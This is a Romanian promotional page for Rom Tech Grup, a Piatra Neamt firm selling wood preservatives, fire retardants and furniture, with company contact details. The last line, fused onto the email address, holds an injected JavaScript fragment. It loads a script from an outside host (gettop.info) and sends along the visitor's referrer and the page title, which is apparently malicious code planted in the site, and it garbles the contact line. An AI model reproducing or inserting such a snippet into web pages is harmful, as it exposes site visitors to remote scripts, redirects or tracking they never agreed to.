224fd899b98a2acace57dc0e7f30f245Lemnul trebuie tratat in mod corespunzator pentru a-si pastra caracteristicile timp indelungat. Rom Tech Grup iti ofera cele mai bune solutii tratare lemn de pe piata, la preturi accesibile si compuse din substante de prima mana. Compania iti ofera numai produse de calitate, atestate de Institutul National al Lemnului, INCERC si alte institutii din domeniu, calitatea si rezultatele obtinute fiind garantate. Tratarea si protejarea lemnului este un procedeu realizat rapid si simplu cu ajutorul acestor produse si avand rezultate pe masura asteptarilor. Printre marcile  solutii tratare lemn comercializate se numara Wood Protect si Oil Protect 612, ideale pentru tratarea lemnului contra oricaror daunatori.

Magma Firestop este o solutie potrivita pentru ignifugarea si hidrofugarea lemnului, asigurand protectie sporita impotriva focului si a umiditatii. Rom Tech Grup sunt considerati liderii incontestabili ai produselor utilizate pentru tratarea lemnului contra daunatorilor de orice tip. Acesti daunatori si actiunea factorilor de mediu nu fac decat afecteze calitatea lemnului, de aceea ai nevoie de substante care sa il protejeze eficient si sa ii confere rezistenta, prevenind patrunderea umiditatii in interior. Toate produsele oferite au un raport optim calitate-pret.

De ce sa optezi pentru solutii tratare lemn?

In primul rand, aceste solutii tratare lemn sunt eficiente pentru mentinerea proprietatilor lemnului timp indelungat indiferent de mediul in care sunt amplasate si de factorii de mediu la care acesta este expus. Fie ca vrei sa optezi pentru solutii anticarii, antifungi sau antimucegai, Rom Tech Grup ofera celor interesati solutii tratare lemn atat pentru cel expus mediului interior, cat si pentru cel de la exterior. In plus, aici vei gasi si tratamente impotriva insectelor de orice fel, cat si ignifuge. Substantele sunt non-toxice, simplu de aplicat prin metodele conventionale si nu au efecte adverse asupra lemnului. In urma aplicarii acestor substante, ele nu modifica structura fizica a materialului. Se pot utiliza pentru sarpante, parchet, garduri, terase, mobilier de gradina, alte parti din structura caselor si orice alte elemente confectionate din lemn.

Aplicarea substantelor se poate realiza in mai multe moduri cum ar fi prin pensulare, pulverizare sau imersie. Utilizeaza produsele oferite de Rom Tech Grup pentru tratamente care dau rezultate si un material rezistent si estetic, fara urme de pete, gauri sau defecte. Aceste substante sunt recomandate in special pentru lemnul care este utilizat in domeniul constructiilor. Fiind substante universale, acestea pastreaza intact lemnul pentru o perioada indelungata de timp. Unul sau doua straturi din aceste substante sunt suficiente pentru asigurarea unei protectii sporite a lemnului.

Rom Tech Grup – specialistii lemnului!

Infiintata in Piatra Neamt, Rom Tech Grup asigura solutii eficiente in domeniu. Solutiile oferite se traduc prin produse de top, certificate de catre institutiile abilitate in domeniu. Rom Tech Grup previne cu succes mucegaiul, ciupercile, atacul insectelor, actiunea focului si a apei. Pe langa comertul cu aceste produse, firma dispune si de un atelier de productie in care se realizeaza piese de mobilier pentru restaurante, mobilier pentru exterior si semifabricate din acest tip de material. Echipa firmei Rom Tech Grup iti va putea oferi consultanta de specialitate pentru a alege cele mai bune produse pentru exigentele tale.

 

Datele de contact ale firmei Rom Tech Grup

Adresa firmei: Bd. Traian, nr. 76, Piatra Neamt

Telefon: 0723 274 875

Email: office@romtecgrup.ros.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;